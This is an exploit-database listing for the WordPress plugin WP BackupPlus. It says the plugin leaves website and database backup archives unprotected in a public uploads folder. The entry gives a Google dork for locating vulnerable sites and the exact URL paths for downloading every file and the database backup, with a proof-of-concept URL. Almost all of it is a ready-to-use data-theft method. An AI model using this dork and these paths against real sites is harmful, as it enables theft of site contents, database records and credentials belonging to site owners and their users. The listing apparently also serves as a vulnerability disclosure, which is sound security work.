[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin WP BackupPlus - Database and Files Backup Download

Author: pSyCh0_3D
type: webapps
platform: php
port: 
date_added: 2014-07-20 
date_updated: 2014-07-22 
verified: 1 
codes: OSVDB-109467 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
# Google Dork: Index of:"/wp-backup-plus"
# Date: 19/07/2014
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
# Vendor Homepage: http://wpbackupplus.com/
# Version:
# Tested on: win7 32 Bit & Linux Kali

[+] Description

wpbackupplus make the backup .zip files and not protected

[+] Exploit:

For download all the website files

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/

For download the Database backup

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp

[+]  POC :

http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.